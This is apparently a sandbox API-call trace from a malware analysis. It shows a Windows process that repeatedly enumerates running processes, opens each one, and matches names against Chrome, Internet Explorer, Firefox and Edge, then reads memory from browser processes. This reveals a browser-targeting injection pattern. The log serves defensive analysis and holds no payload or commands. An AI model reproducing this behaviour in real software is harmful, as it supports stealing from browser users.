	[0237.961] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0237.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.961] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0237.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.961] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0237.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.962] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.962] NtQueryInformationProcess (in: ProcessHandle=0x7cb0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0237.962] ReadProcessMemory (in: hProcess=0x7cb0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0237.962] ReadProcessMemory (in: hProcess=0x7cb0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0237.962] ReadProcessMemory (in: hProcess=0x7cb0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0237.962] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0237.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0237.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7cb4
	[0237.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.964] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0237.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.964] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0237.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.965] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0237.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.965] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.965] NtQueryInformationProcess (in: ProcessHandle=0x7cb4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0237.965] ReadProcessMemory (in: hProcess=0x7cb4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0237.965] ReadProcessMemory (in: hProcess=0x7cb4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0237.965] ReadProcessMemory (in: hProcess=0x7cb4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0237.965] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0237.966] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0237.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7cb8
	[0237.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.967] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0237.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.967] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0237.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0237.970] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7cbc
	[0237.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.970] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0237.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.970] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.971] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0237.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.971] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.972] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7cc0
	[0237.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.973] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.973] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.974] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.974] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.975] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.976] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7cc4
	[0237.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.977] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.977] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.978] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.991] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.991] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.992] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7cc8
	[0237.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.992] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.993] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.993] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.993] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.993] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0237.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7ccc
	[0237.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.995] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0237.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.995] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.996] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0237.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.996] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.996] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7cd0
	[0237.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.997] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.998] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.998] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.998] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.998] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.999] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7cd4
	[0237.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.999] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.000] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.000] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.000] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.000] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0238.001] CloseHandle (hObject=0x4fd0) returned 1
	[0238.001] Sleep (dwMilliseconds=0x64) 
	[0238.104] GetCurrentProcessId () returned 0x110
	[0238.104] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0238.108] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0238.109] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0238.110] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0238.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7cd8
	[0238.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.111] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.112] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.112] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.113] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.113] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0238.114] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7cdc
	[0238.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.114] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.115] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.115] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.116] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.116] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0238.117] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7ce0
	[0238.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.117] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0238.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.118] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.119] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0238.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.120] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.120] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0238.122] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7ce4
	[0238.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.122] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.122] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.123] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.123] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.124] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0238.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7ce8
	[0238.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.125] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0238.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.125] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.126] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0238.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.127] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.127] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0238.128] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7cec
	[0238.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.128] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0238.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.129] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.129] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0238.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.130] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.130] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0238.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7cf0
	[0238.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.131] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0238.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.132] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.132] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0238.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.133] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.133] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0238.134] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7cf4
	[0238.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.134] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0238.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.134] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.137] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0238.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.137] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.137] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7cf8
	[0238.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.138] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.138] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.139] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.139] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.139] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7cfc
	[0238.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.140] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.141] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.141] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.141] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.141] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7d00
	[0238.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.142] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.143] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.143] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.143] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.144] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7d04
	[0238.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.145] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.145] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.145] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.146] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
